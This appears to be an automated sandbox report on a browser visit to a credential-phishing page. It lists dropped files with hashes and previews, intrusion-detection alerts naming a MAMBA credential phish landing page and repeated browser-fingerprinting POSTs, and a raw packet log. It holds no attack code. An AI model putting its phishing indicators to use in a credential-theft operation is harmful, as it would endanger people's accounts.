                                                        MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                        SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                        SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                        SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIuCSpWZEw9306REgUNkWGVThIFDTWGVBwSBQ2RYZVOEgUNkWGVTiFAzDz8gnx48g==?alt=proto
                                                        Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):1636
                                                        Entropy (8bit):4.214613323368661
                                                        Encrypted:false
                                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                        Category:dropped
                                                        Size (bytes):2407
                                                        Entropy (8bit):7.900400471609788
                                                        Encrypted:false
                                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:dropped
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                        Category:dropped
                                                        Size (bytes):199
                                                        Entropy (8bit):6.766983163126765
                                                        Encrypted:false
                                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                        MD5:21B761F2B1FD37F587D7222023B09276
                                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                        No static file info

                                                        Download Network PCAP: filteredfull

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-03-27T14:41:18.161651+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.549727104.21.70.232443TCP
                                                        2025-03-27T14:41:19.812852+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549732104.21.70.232443TCP
                                                        2025-03-27T14:41:42.913312+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549773104.21.70.232443TCP
                                                        2025-03-27T14:41:46.737180+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549774104.21.70.232443TCP
                                                        2025-03-27T14:41:49.861428+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549785104.21.70.232443TCP
                                                        2025-03-27T14:41:53.108461+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549797104.21.70.232443TCP
                                                        2025-03-27T14:41:56.201164+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549808104.21.70.232443TCP
                                                        2025-03-27T14:41:59.264797+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549819104.21.70.232443TCP
                                                        2025-03-27T14:42:02.595155+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549830104.21.70.232443TCP
                                                        2025-03-27T14:42:05.820985+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549841104.21.70.232443TCP
                                                        2025-03-27T14:42:09.355526+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549852104.21.70.232443TCP
                                                        2025-03-27T14:42:13.142082+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549863104.21.70.232443TCP
                                                        2025-03-27T14:42:16.443109+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549877104.21.70.232443TCP
                                                        2025-03-27T14:42:20.259544+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549889104.21.70.232443TCP
                                                        2025-03-27T14:42:23.917746+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549907104.21.70.232443TCP
                                                        2025-03-27T14:42:27.796430+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549918104.21.70.232443TCP
                                                        2025-03-27T14:42:31.101630+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.549930104.21.70.232443TCP
                                                        • Total Packets: 1665
                                                        • 443 (HTTPS)
                                                        • 80 (HTTP)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 27, 2025 14:41:02.707166910 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:03.024678946 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:03.643863916 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:03.675085068 CET49672443192.168.2.5204.79.197.203
                                                        Mar 27, 2025 14:41:04.858939886 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:07.268848896 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:12.081506968 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:13.331533909 CET49672443192.168.2.5204.79.197.203
                                                        Mar 27, 2025 14:41:15.308168888 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:15.308218002 CET44349725142.250.81.228192.168.2.5
                                                        Mar 27, 2025 14:41:15.308291912 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:15.308469057 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:15.308481932 CET44349725142.250.81.228192.168.2.5
                                                        Mar 27, 2025 14:41:15.492218971 CET44349725142.250.81.228192.168.2.5
                                                        Mar 27, 2025 14:41:15.492333889 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:15.493336916 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:15.493347883 CET44349725142.250.81.228192.168.2.5
                                                        Mar 27, 2025 14:41:15.493606091 CET44349725142.250.81.228192.168.2.5
                                                        Mar 27, 2025 14:41:15.535032034 CET49725443192.168.2.5142.250.81.228
                                                        Mar 27, 2025 14:41:16.574659109 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.574704885 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.574810982 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.575215101 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.575253010 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.575340986 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.575364113 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.575376987 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.575514078 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.575525999 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.755620956 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.755711079 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.757869005 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.757884026 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.758138895 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.758519888 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.764592886 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.764679909 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.765600920 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:16.765610933 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.766002893 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.800275087 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:16.817104101 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.161660910 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.161703110 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.161745071 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.161786079 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.161801100 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.161835909 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.161859989 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.161884069 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.173011065 CET49727443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.173032045 CET44349727104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:18.193198919 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:18.240271091 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564268112 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564327002 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564354897 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564390898 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564412117 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.564446926 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564469099 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.564491987 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564538002 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564538002 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.564553022 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564584970 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.564588070 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564594984 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.564634085 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.564979076 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565049887 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565099001 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.565099001 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565109015 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565853119 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565891027 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565907001 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.565928936 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.565943956 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.565979004 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566013098 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566046000 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566063881 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.566072941 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566083908 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.566838980 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566864967 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566899061 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566904068 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.566915035 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.566963911 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.568367958 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.568419933 CET44349726104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.568476915 CET49726443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633121014 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633178949 CET44349731104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.633301020 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633361101 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633377075 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.633966923 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633966923 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.633981943 CET44349731104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.634226084 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.634241104 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.650181055 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.650212049 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.650274038 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.650621891 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.650634050 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.809257030 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.809514046 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.809950113 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.809957027 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.810278893 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.811872959 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.811872959 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.811918020 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.812021971 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.812063932 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.812635899 CET44349731104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.812773943 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.812800884 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.812824011 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.812925100 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.812954903 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.813153982 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.813163996 CET44349731104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.813225031 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.813230991 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.813266039 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.813277960 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.813317060 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.813333988 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.813515902 CET44349731104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:19.828360081 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.828707933 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.829634905 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.829646111 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.829909086 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.831604958 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:19.858479977 CET49731443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:19.872277021 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.024039030 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.024144888 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.024571896 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.024571896 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.024599075 CET4434973435.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.025212049 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.025263071 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.025351048 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.025368929 CET49734443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.025496006 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.025510073 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.198239088 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.198589087 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.198616982 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.198806047 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.198811054 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.392329931 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.392404079 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:20.392481089 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.400243998 CET49735443192.168.2.535.190.80.1
                                                        Mar 27, 2025 14:41:20.400285006 CET4434973535.190.80.1192.168.2.5
                                                        Mar 27, 2025 14:41:21.691804886 CET49676443192.168.2.520.189.173.14
                                                        Mar 27, 2025 14:41:25.151586056 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151644945 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151680946 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151709080 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151736021 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151761055 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.151782036 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.152187109 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.152213097 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.160267115 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.166831970 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.389148951 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389205933 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389293909 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.389308929 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389364958 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389394999 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389431000 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.389614105 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.389636040 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.390269995 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.390310049 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.390338898 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.390369892 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.390398026 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391165972 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391172886 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.391182899 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391222954 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391251087 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391278982 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391316891 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.391824961 CET49732443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:41:25.391834021 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.392105103 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.392128944 CET44349732104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:41:25.392425060 CET49732443192.168.2.5104.21.70.232
